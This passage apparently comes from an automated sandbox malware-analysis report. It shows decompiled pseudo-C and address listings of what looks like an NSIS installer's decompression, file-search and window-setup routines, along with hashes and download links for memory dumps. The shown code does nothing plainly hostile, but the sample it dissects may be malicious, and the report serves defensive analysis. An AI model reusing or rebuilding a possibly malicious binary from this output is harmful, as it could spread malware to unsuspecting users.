										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                            0x00000000
                                            0x00406925
                                            0x00406925
                                            0x0040692a
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00406f91
                                            0x00406f91
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00407007
                                            0x00407007
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x00000000
                                            0x00407195
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407004
                                            0x00000000
                                            0x00407004
                                            0x0040692c
                                            0x0040692c
                                            0x00406930
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406975
                                            0x00406993
                                            0x00406995
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bba
                                            0x00406bbd
                                            0x00406b60
                                            0x00406b66
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406bbf
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00000000
                                            0x00406b5d
                                            0x00406977
                                            0x00406977
                                            0x0040697a
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a69
                                            0x00406a6c
                                            0x004069e3
                                            0x004069e3
                                            0x004069e9
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406af6
                                            0x00406af9
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a99
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00406cd0
                                            0x00406cd0
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406a72
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x004071ab
                                            0x004071b3
                                            0x004071ba
                                            0x004071bc
                                            0x004071c3
                                            0x004071c7
                                            0x004071c7
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x00000000
                                            0x004069e0
                                            0x00406a6c
                                            0x00406975
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x004071c0
                                            0x004071c0
                                            0x00000000
                                            0x004071c0
                                            0x004067b8
                                            0x00000000
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x00406822
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be6
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf3
                                            0x00406bf6
                                            0x00406bf9
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c08
                                            0x00406c09
                                            0x00406c0b
                                            0x00406c0e
                                            0x00406c11
                                            0x00406c14
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406c19
                                            0x00406bca
                                            0x00406bcd
                                            0x00406bd0
                                            0x00406bda
                                            0x00000000
                                            0x00000000
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c55
                                            0x00406c58
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c34
                                            0x00406c37
                                            0x00406c3a
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406c4d
                                            0x00000000
                                            0x00000000
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406ced
                                            0x00406cf0
                                            0x00406cf3
                                            0x00406cfd
                                            0x00000000
                                            0x00406cfd
                                            0x00406ce8
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00406d23
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00406c1c
                                            0x00406c1c
                                            0x00406c1f
                                            0x00000000
                                            0x00000000
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f81
                                            0x00406f84
                                            0x00406f8e
                                            0x00000000
                                            0x00406f8e
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6b
                                            0x00406f6e
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x0040704f
                                            0x0040704f
                                            0x00000000
                                            0x0040704f
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x0040710c
                                            0x00000000
                                            0x00000000
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00406d5a
                                            0x00406d5d
                                            0x00406d60
                                            0x00406d62
                                            0x00406d64
                                            0x00406d64
                                            0x00406d65
                                            0x00406d68
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d80
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00000000
                                            0x00407065
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x00000000
                                            0x004071a1
                                            0x0040706f
                                            0x00407072
                                            0x00407075
                                            0x00407079
                                            0x0040707c
                                            0x00407082
                                            0x00407084
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708d
                                            0x0040708d
                                            0x00407091
                                            0x004070f1
                                            0x004070f4
                                            0x004070f9
                                            0x004070fa
                                            0x004070fc
                                            0x004070fe
                                            0x00407101
                                            0x00000000
                                            0x00407101
                                            0x00407093
                                            0x00407099
                                            0x0040709c
                                            0x0040709f
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b1
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070d3
                                            0x004070d6
                                            0x004070da
                                            0x004070dc
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070be
                                            0x004070c3
                                            0x004070c5
                                            0x004070c8
                                            0x004070c8
                                            0x004070e3
                                            0x004070ea
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00000000
                                            0x00406f56
                                            0x00406f54
                                            0x00407189
                                            0x00000000
                                            0x00000000
                                            0x004067b8

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                            • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                                            • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                            • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040659C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}




                                            0x004065a7
                                            0x004065b0
                                            0x00000000
                                            0x004065bd
                                            0x004065b3
                                            0x00000000

                                            APIs
                                            • FindFirstFileA.KERNELBASE(73BCFA90,004225A0,C:\Users\user\AppData\Local\Temp\nszA951.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,00000000,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560), ref: 004065A7
                                            • FindClose.KERNEL32(00000000), ref: 004065B3
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nszA951.tmp, xrefs: 0040659C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\Users\user\AppData\Local\Temp\nszA951.tmp
                                            • API String ID: 2295610775-769776495
                                            • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                            • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                                            • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                            • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403A3B, Relevance: 51.0, APIs: 14, Strings: 15, Instructions: 215stringregistryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406186("1033", _t67 & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                            0x00403a41
                                            0x00403a4a
                                            0x00403a51
                                            0x00403a53
                                            0x00403a67
                                            0x00403a79
                                            0x00403a80
                                            0x00403a87
                                            0x00403a8d
                                            0x00403a92
                                            0x00403a98
                                            0x00403aab
                                            0x00403aab
                                            0x00403ab6
                                            0x00403a55
                                            0x00403a55
                                            0x00403a60
